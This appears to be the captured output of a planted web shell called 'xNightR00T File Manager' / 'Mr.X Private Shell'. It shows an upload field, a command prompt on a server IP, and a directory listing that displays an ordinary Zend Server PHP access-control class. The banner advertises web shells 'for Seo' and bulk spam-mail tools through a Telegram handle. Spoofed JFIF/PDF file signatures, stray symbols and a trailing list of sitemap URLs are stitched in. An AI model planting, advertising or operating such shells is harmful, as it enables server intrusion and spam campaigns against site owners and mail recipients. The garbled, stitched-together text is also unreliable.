xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace Deployment;

use ZendServer\Permissions\AclQuerierInterface;
use ZendServer\Permissions\AclQuery;
use Zend\Acl\Acl;
use Application\Module as appModule;
use ZendServer\Log\Log;
use Acl\Db\MapperGroups;
use Users\Identity;
use Zend\EventManager\Event;
use Users\IdentityAwareInterface;

class IdentityFilterGroups extends IdentityFilterSimple implements IdentityAwareInterface, AclQuerierInterface
{
    /**
     * @var Identity
     */
    private $identity;

    /**
     * @var MapperGroups
     */
    private $mapperGroups;

    /**
     * @var Acl
     */
    private $acl;

    /**
     * @param array $applications
     * @param bool $emptyIsAll
     * @return array
     * @throws IdentityFilterException
     */
    public function filterAppIds(array $applications, $emptyIsAll = false)
    {
        $result = array();
        // if the current role is allowed access to all applications, use the simple filter instead
        if ($this->getAcl()->isAllowed('data:applications')) {
            $result = parent::filterAppIds($applications, $emptyIsAll);
        } else {

            $allowGlobal = $this->getAcl()->isAllowed('data:globalApplication');
            if ((!$applications) && (!$emptyIsAll)) {
                if ($allowGlobal && $this->isAddGlobalAppId()) {
                    $result = array(-1);
                } else {
                    $result = array();
                }
            } else {

                Log::debug('Filter applications for display');
                if ($emptyIsAll && (!$applications)) {
                    $result = $this->retrieveAccountApplications($this->getIdentity());
                } else {
                    $result = array_values(array_intersect($this->retrieveAccountApplications($this->getIdentity()),
                            $applications));
                }

                if ($allowGlobal && $this->isAddGlobalAppId()) {
                    $result[] = -1;
                }
            }
        }

        if (0 == count($result)) {
            throw new IdentityFilterException(_t('Applications array is empty'),
            IdentityFilterException::EMPTY_APPLICATIONS_ARRAY);
        }

        return $result;
    }

    /**
     * @return AclQuery $acl
     */
    public function getAcl()
    {
        return $this->acl;
    }

    /**
     * @return Identity $identity
     */
    public function getIdentity()
    {
        return $this->identity;
    }

    /**
     * @param Identity $identity
     * @return IdentityFilterGroups
     */
    public function setIdentity(Identity $identity)
    {
        $this->identity = $identity;
        return $this;
    }

    /**
     * @param AclQuery $acl
     * @return IdentityFilterGroups
     */
    public function setAcl(AclQuery $acl)
    {
        $this->acl = $acl;
        return $this;
    }

    /**
     * @param \Acl\Db\MapperGroups $mapperGroups
     * @return Ldap
     */
    public function setMapperGroups($mapperGroups)
    {
        $this->mapperGroups = $mapperGroups;
        return $this;
    }

    /**
     * @param Identity $identity
     * @return array
     */
    private function retrieveAccountApplications(Identity $identity)
    {
        $groups             = $identity->getGroups();
        $mappedApplications = $this->mapperGroups->findAllMappedApplications();
        $applications       = array_intersect($mappedApplications, $groups);
        return array_keys($applications);
    }
}

Filemanager

Name Type Size Permission Actions
Application Folder 0755
Controller Folder 0755
Db Folder 0755
Forms Folder 0755
InputFilter Folder 0755
Mapper Folder 0755
Validator Folder 0755
View Folder 0755
Exception.php File 4.05 KB 0644
FilteredAccessMapper.php File 2.98 KB 0644
IdentityApplicationsAwareInterface.php File 213 B 0644
IdentityFilterException.php File 282 B 0644
IdentityFilterGroups.php File 3.4 KB 0644
IdentityFilterInterface.php File 538 B 0644
IdentityFilterSimple.php File 2.11 KB 0644
Model.php File 45.94 KB 0644
SessionStorage.php File 6.69 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml